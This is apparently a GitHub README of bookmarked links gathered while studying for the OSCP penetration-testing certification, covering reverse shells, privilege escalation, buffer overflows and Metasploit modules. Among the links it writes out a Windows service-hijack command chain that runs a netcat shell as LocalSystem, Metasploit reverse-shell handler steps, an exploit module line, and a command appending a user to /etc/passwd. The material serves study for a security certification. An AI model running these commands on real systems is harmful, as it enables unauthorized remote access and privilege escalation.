bhasbor / OSCP-2

This repo consists of important links (or URLs) which were bookmarked during my journey of OSCP Certification.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

OSCP - Journey

** This repo consists of important links (or URLs) which were bookmarked during my journey of OSCP Certification **

!! Note !!

** Most of the links are considered to be SPOLIERS :P !!!**

Reverse and Bind Shell tutorials

https://null-byte.wonderhowto.com/how-to/create-reverse-shell-remotely-execute-root-commands-over-any-open-port-using-netcat-bash-0132658/

http://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet (for getting PHP reverse shell)

Different Types of Shells (Like Php, bash, netcat ....)

https://highon.coffee/blog/reverse-shell-cheat-sheet/

Privilege Escalation

  1. Windows PE

http://www.fuzzysecurity.com/tutorials/16.html

  1. sc qc upnphost
  2. sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
  3. sc config upnphost obj= ".\LocalSystem" password= ""
  4. sc qc upnphost
  5. net start upnphost

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

  1. Linux Kernel 2.6.22 < 3.9 --> Dirty Cow

https://www.exploit-db.com/exploits/40839/

https://www.youtube.com/watch?v=iyhbLeOzegM

Buffer Overflow (BO)

Q) What is buffer-overflow

https://www.youtube.com/watch?v=TsQufuT80uc

# For Practicing (BO)
  1. Vanilla EIP >> http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/

  2. SL Mail >> https://www.youtube.com/watch?v=Pi51KlEulj4

Buffer Overflow Python Script

https://gist.github.com/abhi3780/9ca5b778a128d6bd259b06efc273b78a

MD5 Decrypter

https://hashkiller.co.uk/md5-decrypter.aspx

For RPC Service

use exploit/windows/dcerpc/ms03_026_dcom

https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/

Extra Toppings

https://pinboard.in/u:unfo/t:oscp

LFI _ Practise

  1. Coldfusion

http://hatriot.github.io/blog/2014/04/02/lfi-to-stager-payload-in-coldfusion/

https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

Using Multihandler

  1. msf>use exploit multi/handler
  2. msf>set payload windows/meterpreter/reverse_tcp
  3. msf>set lhost
  4. msf>set lport
  5. msf> set ExitOnSession false
  6. msf>exploit -j

append users in /etc/passwd

echo "line:to:add" >> /etc/passwd

MSF Payloads

https://netsec.ws/?p=331

http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

OpenFuck / NT SNT Samba Server / Trans2open

https://kongwenbin.wordpress.com/tag/openfuck/

Phplite_admin 1.9.3

https://www.youtube.com/watch?v=G1i5oWblx9Q

ManageEngine Multiple Products Authenticated File Upload

https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_auth_upload

ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow

https://www.rapid7.com/db/modules/exploit/linux/ftp/proftp_telnet_iac

Oracle 9i XDB - HTTP PASS Overflow

https://www.exploit-db.com/exploits/16809/

SMTP & POP3 / AUTH LOGIN

http://www.suburbancomputer.com/tips_email.htm

https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet

To be Cont.......

About

This repo consists of important links (or URLs) which were bookmarked during my journey of OSCP Certification.